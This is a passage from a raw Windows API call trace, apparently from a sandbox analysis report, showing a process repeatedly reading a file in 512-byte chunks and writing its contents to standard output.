0x1632 [0234.499] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.499] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.499] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.499] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.499] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.499] GetFileType (hFile=0x4c) returned 0x1 [0234.499] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.499] GetFileType (hFile=0x4c) returned 0x1 [0234.499] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.499] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.501] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.501] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.502] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.502] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.503] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.503] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.504] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.504] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.505] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.505] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.506] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.506] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.508] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.508] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, 